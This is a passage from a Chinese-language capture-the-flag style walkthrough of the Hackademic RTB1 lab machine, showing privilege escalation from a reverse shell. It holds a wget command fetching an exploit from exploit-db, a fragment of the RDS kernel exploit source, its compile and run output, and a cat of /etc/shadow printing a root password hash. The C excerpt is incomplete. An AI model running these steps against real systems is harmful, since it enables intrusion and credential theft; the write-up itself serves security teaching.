16. 现在我们来连接看看:
试下能不能执行一些 linux 命令。
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname –a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45
EST 2009 i686 i686 i386 GNU/Linux
Id 命令是用来查看用户组的。
pwd 命令式用来查看服务器当前目录的。
uname –a 命令式用来查看用户信息和 kernel 的版本
好了我们知道当前服务器的 kernel 的版本是 2.6.31.5-127.fc12.1686
让我们来查看下 exploit-db.com 这版本“kernel 2.6.31 ”的漏洞信息
Date D A V Description Plat. Author
2009-10-1 § - Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial 904 linu Simon
5 of Service x Vallet
17. 2009-08-3 - Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte 137 linu Jon
§
1 Stack Disclosure Exploit 0 x Oberheide
2009-08-2 - Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 105 linu Jon
§
5 5-Byte Stack Disclosure 9 x Oberheide
2009-08-0 - Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte 106 linu Jon
§
4 Stack Disclosure Exploit 4 x Oberheide
之后我尝试了列表下所有的漏洞,结果木有一个能用~~RP 有点低!后来我又尝试拿起大刀
(新漏洞)
Date D A V Description Plat. Author
2010-10-1 - Linux RDS Protocol Local Privilege 997 linu Dan
§
9 Escalation 7 x Rosenberg
http://www.exploit-db.com/exploits/15285
我打开这地址复制这地址
http://www.exploit-db.com/download/15285
然后在 nc 反弹回来的 shell 下执行这命令 wget http://www.exploit-db.com/download/15285 -
O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285 Resolving
www.exploit-db.com... 199.27.135.111, 199.27.134.111 Connecting to
www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following] --2011-12-28
00:48:02-- http://www.exploit-db.com/download/15285/ Connecting to
www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ..
18. 我们用 wget 命令来获取 exploit-db.com 上的漏洞信息并用 –O 参数来重命名为 roro.c
注意: linux kernel 大多数是由 c 开发的所以保存为.c 的扩展名,现在来看看漏洞利用程序的
源代码。
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port) int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.n”); exit(-1);
memset(&addr, 0, sizeof(addr));
上面的代码都是用 c 写的。
保存后我们将代码编译为 elf 形式
gcc roro.c –o roro
19. 运行漏洞程序
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
然后我们输入 id 命令,可以看到我们已经获得 root 的权限
uid=0(root) gid=0(root)
我们能查看 /etc/shadow 文件
cat /etc/shadow root:
$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9V
Y6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::